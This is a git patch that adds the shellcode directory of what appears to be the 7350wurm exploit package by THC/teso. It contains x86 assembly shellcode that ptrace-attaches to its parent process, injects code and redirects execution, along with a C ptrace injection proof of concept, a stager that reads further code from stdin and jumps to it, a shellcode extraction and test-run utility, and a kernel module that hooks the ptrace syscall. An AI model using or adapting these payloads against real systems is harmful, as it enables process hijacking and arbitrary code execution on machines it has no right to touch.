From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- exploits/7350wurm/shellcode/bambam.s | 230 ++++++++++++++++++++++ exploits/7350wurm/shellcode/codedump | Bin 0 -> 6555 bytes exploits/7350wurm/shellcode/codedump.c | 93 +++++++++ exploits/7350wurm/shellcode/pt/Makefile | 8 + exploits/7350wurm/shellcode/pt/README | 6 + exploits/7350wurm/shellcode/pt/rptrace.c | 42 ++++ exploits/7350wurm/shellcode/pt/rptrace.o | Bin 0 -> 1456 bytes exploits/7350wurm/shellcode/pt/x.tar.gz | Bin 0 -> 800 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit | Bin 0 -> 7622 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit.c | 192 ++++++++++++++++++ exploits/7350wurm/shellcode/t | Bin 0 -> 4994 bytes exploits/7350wurm/shellcode/t.c | 12 ++ exploits/7350wurm/shellcode/write-read-exec.s | 38 ++++ 13 files changed, 621 insertions(+) create mode 100644 exploits/7350wurm/shellcode/bambam.s create mode 100644 exploits/7350wurm/shellcode/codedump create mode 100644 exploits/7350wurm/shellcode/codedump.c create mode 100644 exploits/7350wurm/shellcode/pt/Makefile create mode 100644 exploits/7350wurm/shellcode/pt/README create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.c create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.o create mode 100644 exploits/7350wurm/shellcode/pt/x.tar.gz create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit.c create mode 100644 exploits/7350wurm/shellcode/t create mode 100644 exploits/7350wurm/shellcode/t.c create mode 100644 exploits/7350wurm/shellcode/write-read-exec.s (limited to 'exploits/7350wurm/shellcode') diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s new file mode 100644 index 0000000..5719ed7 --- /dev/null +++ b/exploits/7350wurm/shellcode/bambam.s @@ -0,0 +1,230 @@ + + .globl cbegin + .globl cend + + +cbegin: +/* getppid */ + pushl $64 + popl %eax + int $0x80 +/* movl %eax, %ecx */ + pushl %eax + xchgl %ebp, %eax + +/* z_fork */ + pushl $2 + popl %eax + int $0x80 + or %eax, %eax + je fchild + + /* waitpid (pid, NULL, 0) */ + pushl $7 + popl %esi + xchgl %esi, %eax /* eax = 7, esi = ppid */ + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 + + xorl %eax, %eax + movb $162, %al + pushl $10 + pushl $10 + movl %esp, %ebx + movl %esp, %ecx + int $0x80 +ui: +jmp ui + /* exit */ +fexit: + + pushl $1 + popl %eax + xorl %ebx, %ebx + int $0x80 + +/*** CHILD ***/ +fchild: pushl $2 /* second fork */ + popl %eax + int $0x80 + + or %eax, %eax + jne fexit + + popl %ecx /* parent process pid */ +/* ptrace attach */ + pushl $26 + popl %eax + cdq + pushl $16 + popl %ebx + xorl %esi, %esi + int $0x80 + +/* ptrace peekdata */ + movl $0x08048210, %edx +/* movl $0xbf7ff010, %edx */ + movl $0xbffff010, %esi + pushl $127 + popl %edi +loopa: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $2 + popl %ebx + pushl %edi + int $0x80 + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopa + +/* ptrace getregs */ + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $12 + popl %ebx + pusha + movl %esp, %esi + int $0x80 + +/* ptrace setregs */ + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $13 + popl %ebx + movl %esp, %esi + movl 48(%esi), %edi + pushl %edi + movl $0x08048210, 48(%esi) +/* movl $0xbf7ff010, 48(%esi)*/ + int $0x80 + + jmp pointX +pointY: + + popl %esi + movl $0x08048210, %edx + pushl $20 + popl %edi +loopc: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + pushl %edi + pushl %esi + movl (%esi), %esi + int $0x80 + popl %esi + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopc + + +/* ptrace pokedata */ +/* movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + movl $0xccccfeeb, %esi*/ +/* movl $0xbf7ff010, %edx*/ + movl $0x08048210, %edx +/* int $0x80*/ + +/*ptrace cont */ + movl %ebp, %ecx + pushl $26 + popl %eax + cdq + pushl $7 + popl %ebx + xorl %esi, %esi + int $0x80 + +/* wait 4 */ +/* 0 on return */ + cdq + movl %eax, %ebx + decl %ebx + movl %eax, %ecx + movb $114, %al + int $0x80 + +/* ptrace pokedata */ + movl $0x08048210, %edx + movl $0xbffff010, %esi +/* movl $0xbf7ff010, %edx*/ + pushl $127 + popl %edi +loopb: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + pushl %edi + pushl %esi + movl (%esi), %esi + int $0x80 + popl %esi + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopb + +/* ptrace setregs */ + popl %edi + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $13 + popl %ebx + movl %esp, %esi + movl %edi, 48(%esi) + int $0x80 + + +/* ptrace detach */ + movl %ebp, %ecx + pushl $17 + popl %ebx + pushl $26 + popl %eax + cdq + movl %edx, %esi + int $0x80 +/* exit */ + xorl %ecx, %ecx + incl %esi + xchgl %esi, %eax + int $0x80 +pointX: + call pointY + + pushl $2 /* second fork */ + popl %eax + int $0x80 + or %eax, %eax + je pointA + int $0x3 +pointA: + jmp pointA + + + + + +cend: + + diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump new file mode 100644 index 0000000..d442fa7 Binary files /dev/null and b/exploits/7350wurm/shellcode/codedump differ diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c new file mode 100644 index 0000000..9494b9e --- /dev/null +++ b/exploits/7350wurm/shellcode/codedump.c @@ -0,0 +1,93 @@ +/* shellcode extraction utility, + * by type / teso, small mods by scut. + */ + + +#include +#include +#include + +#ifdef IRIX +#include +#endif + +#ifdef HPUX +extern char * cbegin; +extern char * cend; +#else +extern void cbegin (); +extern void cend (); +#endif + +typedef void (* fptr)(void); + +int +bad (unsigned char u); + + +int +main (int argc, char *argv[]) +{ + int i, + bbytes = 0; + unsigned char * buf = (unsigned char *) cbegin; + + unsigned char ebuf[1024]; + fptr ebuf_p = (fptr) &ebuf[0]; + + + fprintf (stderr, "/* %lu byte shellcode */\n", + (unsigned long int) cend - (unsigned long int) cbegin); + + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + if (i % 12 == 0 && buf > (unsigned char *) cbegin) + printf ("\n"); + if (i % 12 == 0) + printf ("\""); + + if (bad (*buf & 0xff)) { + printf ("_\\x%02x_", *buf & 0xff); + bbytes += 1; + } else { + printf ("\\x%02x", *buf & 0xff); + } + + if (++i >= 12) { + i = 0; + printf ("\""); + } + } + if (i % 12 == 0) + printf (";\n"); + else + printf ("\";\n"); + + printf("\n"); + + fprintf (stderr, "bad bytes = %d\n", bbytes); + + if (argc > 1) { + memcpy (ebuf, cbegin, (unsigned long int) cend - + (unsigned long int) cbegin); +#ifdef IRIX + memcpy (ebuf + ((unsigned long int) cend - + (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40); + cacheflush (ebuf, sizeof (ebuf), BCACHE); +#endif + ebuf_p (); + } + + exit (EXIT_SUCCESS); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + + diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile new file mode 100644 index 0000000..e5e1fd5 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/Makefile @@ -0,0 +1,8 @@ + +all: rptrace.c + rm -f rptrace.o + gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o + +clean: + rm -f rptrace.o + diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README new file mode 100644 index 0000000..0139382 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/README @@ -0,0 +1,6 @@ +This is a *simple* HACK to get around the ptrace/exec security problem +in linux <2.2.19. It simply disables ptrace for everyone except root. +Just make, and insmod the .o .. and your uptime will be preserved! :P + +-MadCamel (madcamel@energymech.net) + diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c new file mode 100644 index 0000000..f7de48b --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/rptrace.c @@ -0,0 +1,42 @@ +#define MODULE +#define __KERNEL__ +#include +#include +#include +#include +#include + +struct task_struct *init_hook = NULL; +extern void *sys_call_table[]; + +int (*o_ptrace)(int, int, int, int); + +int n_ptrace(int req, int pid, int addr, int data) +{ + int r; + + r = o_ptrace(req, pid, addr, data); + printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r); + return (r); +} + +#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\ + sys_call_table[__NR_##x] = n_##x +int init_module(void) +{ + lock_kernel(); + EXPORT_NO_SYMBOLS; + REPLACE(ptrace); + unlock_kernel(); + return(0); +} + +#define RESTORE(x) sys_call_table[__NR_##x] = o_##x +int cleanup_module(void) +{ + lock_kernel(); + RESTORE(ptrace); + unlock_kernel(); + return(0); +} + diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o new file mode 100644 index 0000000..dd3bc56 Binary files /dev/null and b/exploits/7350wurm/shellcode/pt/rptrace.o differ diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz new file mode 100644 index 0000000..06ba614 Binary files /dev/null and b/exploits/7350wurm/shellcode/pt/x.tar.gz differ diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit new file mode 100644 index 0000000..e3e02c1 Binary files /dev/null and b/exploits/7350wurm/shellcode/ptrace/ptrace-legit differ diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c new file mode 100644 index 0000000..870da8a --- /dev/null +++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c @@ -0,0 +1,192 @@ +/* -scutstyle */ + +#include +#include +#include +#include +#include +#include +#include + + +pid_t z_fork (void); +void hexdump (unsigned char *data, unsigned int amount); + +unsigned char shellcode[] = "\x90\x90\xcc\x73"; + +int +main (int argc, char *argv[]) +{ + pid_t cpid; + struct user regs; + unsigned long int safed_eip; + unsigned long int addr, + addr_walker; + unsigned char data_saved[256]; + + +#if 0 + if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) { + printf ("usage: %s \n", argv[0]); + exit (EXIT_FAILURE); + } +#endif + cpid = getppid(); + if (z_fork () != 0) { + printf ("parent. exiting.\n"); + exit (EXIT_FAILURE); + } + + printf ("pid = %d\n", cpid); + + printf ("exploiting\n\n"); + + if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) { + perror ("ptrace"); + exit (EXIT_FAILURE); + } + + /* save data */ + addr = 0xbffff010; + for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) { + data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid, + addr + addr_walker, NULL); + } + hexdump (data_saved, sizeof (data_saved)); + + /* write */ + for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ; + ++addr_walker) + { + ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker, + shellcode[addr_walker] & 0xff); + } + + /* redirect eip */ + memset (®s, 0, sizeof (regs)); + if (ptrace (PTRACE_GETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + // write eip */ + safed_eip = regs.regs.eip; + regs.regs.eip = 0xbffff010; + if (ptrace (PTRACE_SETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + + if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) { + perror ("ptrace PTRACE_CONT"); + exit (EXIT_FAILURE); + } + + wait (NULL); + printf ("detrap\n"); + + /* restore */ + for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) { + ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker, + data_saved[addr_walker] & 0xff); + } + + /* restore regs */ + regs.regs.eip = safed_eip; + if (ptrace (PTRACE_SETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + + if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) { + perror ("ptrace PTRACE_DETACH"); + exit (EXIT_FAILURE); + } + + exit (EXIT_SUCCESS); +} + + + +void +hexdump (unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." + "........................................"; + + for (dp = 1; dp <= amount; dp++) { + printf ("%02x ", data[dp-1]); + if ((dp % 8) == 0) + printf (" "); + if ((dp % 16) == 0) { + printf ("| "); + p = dp; + for (dp -= 16; dp < p; dp++) + printf ("%c", trans[data[dp]]); + printf ("\n"); + } + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + printf (" "); + if (((dp % 8) == 0) && (p != 8)) + printf (" "); + } + printf (" | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + printf ("%c", trans[data[dp]]); + } + printf ("\n"); + + return; +} + + +/* z_fork + * + * fork and detach forked client completely to avoid zombies. + * taken from richard stevens excellent system programming book :) thanks, + * whereever you are now. + * + * caveat: the pid of the child has already died, it can just be used to + * differentiate between parent and not parent, the pid of the + * child is inaccessibly. + * + * return pid of child for old process + * return 0 for child + */ + +pid_t +z_fork (void) +{ + pid_t pid; + + pid = fork (); + if (pid < 0) { + return (pid); + } else if (pid == 0) { + /* let the child fork again + */ + + pid = fork (); + if (pid < 0) { + return (pid); + } else if (pid > 0) { + /* let the child and parent of the second child + * exit + */ + exit (EXIT_SUCCESS); + } + + return (0); + } + + waitpid (pid, NULL, 0); + + return (pid); +} diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t new file mode 100644 index 0000000..eb3478b Binary files /dev/null and b/exploits/7350wurm/shellcode/t differ diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c new file mode 100644 index 0000000..7c1aa4f --- /dev/null +++ b/exploits/7350wurm/shellcode/t.c @@ -0,0 +1,12 @@ + +#include + +int +main (int argc, char *argv[]) +{ + char * foo[4] = { "./codedump", "a", "b", NULL }; + + execve (foo[0], foo, NULL); +} + + diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s new file mode 100644 index 0000000..6f3956c --- /dev/null +++ b/exploits/7350wurm/shellcode/write-read-exec.s @@ -0,0 +1,38 @@ + .globl cbegin + .globl cend + +cbegin: + +/* write: ebx = fd, ecx = where, edx = length, eax = 4 */ +wr_pos: xorl %ebx, %ebx + incl %ebx /* ebx = 1 */ + + movl $0x0b51740b, %eax + subl $0x01010101, %eax + push %eax + movl %esp, %ecx /* ecx = "AAA\n" */ + + push $0x04 + pop %eax /* eax = 4 */ + movl %eax, %edx + + int $0x80 /* write (1, "AAA\n", 4) */ + + jmp ctramp +rd_cde: xorl %ebx, %ebx + mull %ebx /* ebx = eax = edx = 0 */ + + decb %dl /* edx = 0xff */ + popl %ecx /* ecx = ncode */ + + push $0x3 + pop %eax + + int $0x80 /* read (0, ncode, 0xff) */ + jmp ncode + +ctramp: call rd_cde +ncode: + +cend: + -- cgit v1.3